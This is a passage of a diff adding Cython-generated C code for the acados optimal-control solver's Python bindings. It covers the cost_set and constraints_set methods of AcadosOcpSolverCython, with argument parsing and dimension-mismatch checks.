__Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_t_1); + __pyx_t_1 = 0; + __Pyx_INCREF(__pyx_kp_u_at_stage); + __pyx_t_3 += 11; + __Pyx_GIVEREF(__pyx_kp_u_at_stage); + PyTuple_SET_ITEM(__pyx_t_5, 2, __pyx_kp_u_at_stage); + __pyx_t_1 = __Pyx_PyUnicode_From_int(__pyx_v_stage, 0, ' ', 'd'); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 578, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_1); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_5, 3, __pyx_t_1); + __pyx_t_1 = 0; + __Pyx_INCREF(__pyx_kp_u_with_dimension); + __pyx_t_3 += 16; + __Pyx_GIVEREF(__pyx_kp_u_with_dimension); + PyTuple_SET_ITEM(__pyx_t_5, 4, __pyx_kp_u_with_dimension); + __pyx_t_1 = __Pyx_carray_to_py_int(__pyx_v_dims, 2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 578, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_6 = __Pyx_PySequence_Tuple(__pyx_t_1); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 578, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_FormatSimple(__pyx_t_6, __pyx_empty_unicode); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 578, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __pyx_t_11 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_1) > __pyx_t_11) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_1) : __pyx_t_11; + __pyx_t_3 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_1); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_5, 5, __pyx_t_1); + __pyx_t_1 = 0; + __Pyx_INCREF(__pyx_kp_u_you_have); + __pyx_t_3 += 11; + __Pyx_GIVEREF(__pyx_kp_u_you_have); + PyTuple_SET_ITEM(__pyx_t_5, 6, __pyx_kp_u_you_have); + __pyx_t_1 = __Pyx_PyObject_FormatSimple(__pyx_v_value_shape, __pyx_empty_unicode); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 578, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_11 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_1) > __pyx_t_11) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_1) : __pyx_t_11; + __pyx_t_3 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_1); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_5, 7, __pyx_t_1); + __pyx_t_1 = 0; + __Pyx_INCREF(__pyx_kp_u__7); + __pyx_t_3 += 1; + __Pyx_GIVEREF(__pyx_kp_u__7); + PyTuple_SET_ITEM(__pyx_t_5, 8, __pyx_kp_u__7); + __pyx_t_1 = __Pyx_PyUnicode_Join(__pyx_t_5, 9, __pyx_t_3, __pyx_t_11); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 578, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":577 + * + * if value_shape[0] != dims[0] or value_shape[1] != dims[1]: + * raise Exception('AcadosOcpSolverCython.cost_set(): mismatching dimension' + # <<<<<<<<<<<<<< + * f' for field "{field_}" at stage {stage} with dimension {tuple(dims)} (you have {value_shape})') + * + */ + __pyx_t_5 = __Pyx_PyUnicode_Concat(__pyx_kp_u_AcadosOcpSolverCython_cost_set_m, __pyx_t_1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 577, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_CallOneArg(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_t_5); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 577, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_Raise(__pyx_t_1, 0, 0, 0); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __PYX_ERR(0, 577, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":576 + * value = np.asfortranarray(value_) + * + * if value_shape[0] != dims[0] or value_shape[1] != dims[1]: # <<<<<<<<<<<<<< + * raise Exception('AcadosOcpSolverCython.cost_set(): mismatching dimension' + + * f' for field "{field_}" at stage {stage} with dimension {tuple(dims)} (you have {value_shape})') + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":581 + * + * acados_solver_common.ocp_nlp_cost_model_set(self.nlp_config, \ + * self.nlp_dims, self.nlp_in, stage, field, &value[0][0]) # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_12 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_12) && PyErr_Occurred())) __PYX_ERR(0, 581, __pyx_L1_error) + if (unlikely(!__pyx_v_value.memview)) { __Pyx_RaiseUnboundLocalError("value"); __PYX_ERR(0, 581, __pyx_L1_error) } + __pyx_t_13 = 0; + __pyx_t_14 = 0; + __pyx_t_8 = -1; + if (__pyx_t_13 < 0) { + __pyx_t_13 += __pyx_v_value.shape[0]; + if (unlikely(__pyx_t_13 < 0)) __pyx_t_8 = 0; + } else if (unlikely(__pyx_t_13 >= __pyx_v_value.shape[0])) __pyx_t_8 = 0; + if (__pyx_t_14 < 0) { + __pyx_t_14 += __pyx_v_value.shape[1]; + if (unlikely(__pyx_t_14 < 0)) __pyx_t_8 = 1; + } else if (unlikely(__pyx_t_14 >= __pyx_v_value.shape[1])) __pyx_t_8 = 1; + if (unlikely(__pyx_t_8 != -1)) { + __Pyx_RaiseBufferIndexError(__pyx_t_8); + __PYX_ERR(0, 581, __pyx_L1_error) + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":580 + * f' for field "{field_}" at stage {stage} with dimension {tuple(dims)} (you have {value_shape})') + * + * acados_solver_common.ocp_nlp_cost_model_set(self.nlp_config, \ # <<<<<<<<<<<<<< + * self.nlp_dims, self.nlp_in, stage, field, &value[0][0]) + * + */ + (void)(ocp_nlp_cost_model_set(__pyx_v_self->nlp_config, __pyx_v_self->nlp_dims, __pyx_v_self->nlp_in, __pyx_v_stage, __pyx_t_12, ((void *)(&(*((double *) ( /* dim=1 */ (( /* dim=0 */ ((char *) (((double *) __pyx_v_value.data) + __pyx_t_13)) ) + __pyx_t_14 * __pyx_v_value.strides[1]) ))))))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":551 + * + * + * def cost_set(self, int stage, str field_, value_): # <<<<<<<<<<<<<< + * """ + * Set numerical data in the cost module of the solver. + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __PYX_XCLEAR_MEMVIEW(&__pyx_t_9, 1); + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.cost_set", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_field); + __PYX_XCLEAR_MEMVIEW(&__pyx_v_value, 1); + __Pyx_XDECREF(__pyx_v_value_shape); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":584 + * + * + * def constraints_set(self, int stage, str field_, value_): # <<<<<<<<<<<<<< + * """ + * Set numerical data in the constraint module of the solver. + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_39constraints_set(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_38constraints_set, "\n Set numerical data in the constraint module of the solver.\n\n :param stage: integer corresponding to shooting node\n :param field: string in ['lbx', 'ubx', 'lbu', 'ubu', 'lg', 'ug', 'lh', 'uh', 'uphi', 'C', 'D']\n :param value: of appropriate size\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_39constraints_set = {"constraints_set", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_39constraints_set, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_38constraints_set}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_39constraints_set(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + int __pyx_v_stage; + PyObject *__pyx_v_field_ = 0; + PyObject *__pyx_v_value_ = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("constraints_set (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_stage,&__pyx_n_s_field_2,&__pyx_n_s_value,0}; + PyObject* values[3] = {0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_stage)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 584, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_field_2)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 584, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("constraints_set", 1, 3, 3, 1); __PYX_ERR(0, 584, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_value)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 584, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("constraints_set", 1, 3, 3, 2); __PYX_ERR(0, 584, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "constraints_set") < 0)) __PYX_ERR(0, 584, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 3)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + } + __pyx_v_stage = __Pyx_PyInt_As_int(values[0]); if (unlikely((__pyx_v_stage == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 584, __pyx_L3_error) + __pyx_v_field_ = ((PyObject*)values[1]); + __pyx_v_value_ = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("constraints_set", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 584, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.constraints_set", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_field_), (&PyUnicode_Type), 1, "field_", 1))) __PYX_ERR(0, 584, __pyx_L1_error) + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_38constraints_set(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_stage, __pyx_v_field_, __pyx_v_value_); + + /* function exit code */ + goto __pyx_L0; + __pyx_L1_error:; + __pyx_r = NULL; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_38constraints_set(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, int __pyx_v_stage, PyObject *__pyx_v_field_, PyObject *__pyx_v_value_) { + PyObject *__pyx_v_field = NULL; + int __pyx_v_dims[2]; + __Pyx_memviewslice __pyx_v_value = { 0, 0, { 0 }, { 0 }, { 0 } }; + PyObject *__pyx_v_value_shape = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + char const *__pyx_t_2; + Py_ssize_t __pyx_t_3; + int __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + int __pyx_t_8; + __Pyx_memviewslice __pyx_t_9 = { 0, 0, { 0 }, { 0 }, { 0 } }; + int __pyx_t_10; + Py_UCS4 __pyx_t_11; + char const *__pyx_t_12; + Py_ssize_t __pyx_t_13; + Py_ssize_t __pyx_t_14; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("constraints_set", 0); + + /* "acados_template/acados_ocp_solver_pyx.pyx":592 + * :param value: of appropriate size + * """ + * field = field_.encode('utf-8') # <<<<<<<<<<<<<< + * + * cdef int dims[2] + */ + if (unlikely(__pyx_v_field_ == Py_None)) { + PyErr_Format(PyExc_AttributeError, "'NoneType' object has no attribute '%.30s'", "encode"); + __PYX_ERR(0, 592, __pyx_L1_error) + } + __pyx_t_1 = PyUnicode_AsUTF8String(__pyx_v_field_); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 592, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_field = __pyx_t_1; + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":596 + * cdef int dims[2] + * acados_solver_common.ocp_nlp_constraint_dims_get_from_attr(self.nlp_config, \ + * self.nlp_dims, self.nlp_out, stage, field, &dims[0]) # <<<<<<<<<<<<<< + * + * cdef double[::1,:] value + */ + __pyx_t_2 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_2) && PyErr_Occurred())) __PYX_ERR(0, 596, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":595 + * + * cdef int dims[2] + * acados_solver_common.ocp_nlp_constraint_dims_get_from_attr(self.nlp_config, \ # <<<<<<<<<<<<<< + * self.nlp_dims, self.nlp_out, stage, field, &dims[0]) + * + */ + ocp_nlp_constraint_dims_get_from_attr(__pyx_v_self->nlp_config, __pyx_v_self->nlp_dims, __pyx_v_self->nlp_out, __pyx_v_stage, __pyx_t_2, (&(__pyx_v_dims[0]))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":600 + * cdef double[::1,:] value + * + * value_shape = value_.shape # <<<<<<<<<<<<<< + * if len(value_shape) == 1: + * value_shape = (value_shape[0], 0) + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_value_, __pyx_n_s_shape); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 600, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_value_shape = __pyx_t_1; + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":601 + * + * value_shape = value_.shape + * if len(value_shape) == 1: # <<<<<<<<<<<<<< + * value_shape = (value_shape[0], 0) + * value = np.asfortranarray(value_[None,:]) + */ + __pyx_t_3 = PyObject_Length(__pyx_v_value_shape); if (unlikely(__pyx_t_3 == ((Py_ssize_t)-1))) __PYX_ERR(0, 601, __pyx_L1_error) + __pyx_t_4 = (__pyx_t_3 == 1); + if (__pyx_t_4) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":602 + * value_shape = value_.shape + * if len(value_shape) == 1: + * value_shape = (value_shape[0], 0) # <<<<<<<<<<<<<< + * value = np.asfortranarray(value_[None,:]) + * + */ + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_value_shape, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 602, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = PyTuple_New(2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 602, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_t_1); + __Pyx_INCREF(__pyx_int_0); + __Pyx_GIVEREF(__pyx_int_0); + PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_int_0); + __pyx_t_1 = 0; + __Pyx_DECREF_SET(__pyx_v_value_shape, __pyx_t_5); + __pyx_t_5 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":603 + * if len(value_shape) == 1: + * value_shape = (value_shape[0], 0) + * value = np.asfortranarray(value_[None,:]) # <<<<<<<<<<<<<< + * + * elif len(value_shape) == 2: + */ + __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_np); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 603, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_6 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_asfortranarray); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 603, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_GetItem(__pyx_v_value_, __pyx_tuple__26); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 603, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_7 = NULL; + __pyx_t_8 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_6))) { + __pyx_t_7 = PyMethod_GET_SELF(__pyx_t_6); + if (likely(__pyx_t_7)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_6); + __Pyx_INCREF(__pyx_t_7); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_6, function); + __pyx_t_8 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_7, __pyx_t_1}; + __pyx_t_5 = __Pyx_PyObject_FastCall(__pyx_t_6, __pyx_callargs+1-__pyx_t_8, 1+__pyx_t_8); + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 603, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + } + __pyx_t_9 = __Pyx_PyObject_to_MemoryviewSlice_dcd__double(__pyx_t_5, PyBUF_WRITABLE); if (unlikely(!__pyx_t_9.memview)) __PYX_ERR(0, 603, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_v_value = __pyx_t_9; + __pyx_t_9.memview = NULL; + __pyx_t_9.data = NULL; + + /* "acados_template/acados_ocp_solver_pyx.pyx":601 + * + * value_shape = value_.shape + * if len(value_shape) == 1: # <<<<<<<<<<<<<< + * value_shape = (value_shape[0], 0) + * value = np.asfortranarray(value_[None,:]) + */ + goto __pyx_L3; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":605 + * value = np.asfortranarray(value_[None,:]) + * + * elif len(value_shape) == 2: # <<<<<<<<<<<<<< + * # Get elements in column major order + * value = np.asfortranarray(value_) + */ + __pyx_t_3 = PyObject_Length(__pyx_v_value_shape); if (unlikely(__pyx_t_3 == ((Py_ssize_t)-1))) __PYX_ERR(0, 605, __pyx_L1_error) + __pyx_t_4 = (__pyx_t_3 == 2); + if (__pyx_t_4) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":607 + * elif len(value_shape) == 2: + * # Get elements in column major order + * value = np.asfortranarray(value_) # <<<<<<<<<<<<<< + * + * if value_shape[0] != dims[0] or value_shape[1] != dims[1]: + */ + __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_np); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 607, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_t_6, __pyx_n_s_asfortranarray); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 607, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __pyx_t_6 = NULL; + __pyx_t_8 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_6 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_6)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_6); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_8 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_6, __pyx_v_value_}; + __pyx_t_5 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_8, 1+__pyx_t_8); + __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; + if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 607, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_t_9 = __Pyx_PyObject_to_MemoryviewSlice_dcd__double(__pyx_t_5, PyBUF_WRITABLE); if (unlikely(!__pyx_t_9.memview)) __PYX_ERR(0, 607, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_v_value = __pyx_t_9; + __pyx_t_9.memview = NULL; + __pyx_t_9.data = NULL; + + /* "acados_template/acados_ocp_solver_pyx.pyx":605 + * value = np.asfortranarray(value_[None,:]) + * + * elif len(value_shape) == 2: # <<<<<<<<<<<<<< + * # Get elements in column major order + * value = np.asfortranarray(value_) + */ + } + __pyx_L3:; + + /* "acados_template/acados_ocp_solver_pyx.pyx":609 + * value = np.asfortranarray(value_) + * + * if value_shape[0] != dims[0] or value_shape[1] != dims[1]: # <<<<<<<<<<<<<< + * raise Exception(f'AcadosOcpSolverCython.constraints_set(): mismatching dimension' + + * f' for field "{field_}" at stage {stage} with dimension {tuple(dims)} (you have {value_shape})') + */ + __pyx_t_5 = __Pyx_GetItemInt(__pyx_v_value_shape, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 609, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 = __Pyx_PyInt_From_int((__pyx_v_dims[0])); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 609, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_6 = PyObject_RichCompare(__pyx_t_5, __pyx_t_1, Py_NE); __Pyx_XGOTREF(__pyx_t_6); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 609, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_10 = __Pyx_PyObject_IsTrue(__pyx_t_6); if (unlikely((__pyx_t_10 < 0))) __PYX_ERR(0, 609, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + if (!__pyx_t_10) { + } else { + __pyx_t_4 = __pyx_t_10; + goto __pyx_L5_bool_binop_done; + } + __pyx_t_6 = __Pyx_GetItemInt(__pyx_v_value_shape, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 609, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_1 = __Pyx_PyInt_From_int((__pyx_v_dims[1])); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 609, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = PyObject_RichCompare(__pyx_t_6, __pyx_t_1, Py_NE); __Pyx_XGOTREF(__pyx_t_5); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 609, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_10 = __Pyx_PyObject_IsTrue(__pyx_t_5); if (unlikely((__pyx_t_10 < 0))) __PYX_ERR(0, 609, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_4 = __pyx_t_10; + __pyx_L5_bool_binop_done:; + if (unlikely(__pyx_t_4)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":611 + * if value_shape[0] != dims[0] or value_shape[1] != dims[1]: + * raise Exception(f'AcadosOcpSolverCython.constraints_set(): mismatching dimension' + + * f' for field "{field_}" at stage {stage} with dimension {tuple(dims)} (you have {value_shape})') # <<<<<<<<<<<<<< + * + * acados_solver_common.ocp_nlp_constraints_model_set(self.nlp_config, \ + */ + __pyx_t_5 = PyTuple_New(9); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 611, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_3 = 0; + __pyx_t_11 = 127; + __Pyx_INCREF(__pyx_kp_u_for_field); + __pyx_t_3 += 12; + __Pyx_GIVEREF(__pyx_kp_u_for_field); + PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_kp_u_for_field); + __pyx_t_1 = __Pyx_PyUnicode_Unicode(__pyx_v_field_); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 611, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_11 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_1) > __pyx_t_11) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_1) : __pyx_t_11; + __pyx_t_3 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_1); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_t_1); + __pyx_t_1 = 0; + __Pyx_INCREF(__pyx_kp_u_at_stage); + __pyx_t_3 += 11; + __Pyx_GIVEREF(__pyx_kp_u_at_stage); + PyTuple_SET_ITEM(__pyx_t_5, 2, __pyx_kp_u_at_stage); + __pyx_t_1 = __Pyx_PyUnicode_From_int(__pyx_v_stage, 0, ' ', 'd'); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 611, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_1); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_5, 3, __pyx_t_1); + __pyx_t_1 = 0; + __Pyx_INCREF(__pyx_kp_u_with_dimension); + __pyx_t_3 += 16; + __Pyx_GIVEREF(__pyx_kp_u_with_dimension); + PyTuple_SET_ITEM(__pyx_t_5, 4, __pyx_kp_u_with_dimension); + __pyx_t_1 = __Pyx_carray_to_py_int(__pyx_v_dims, 2); if 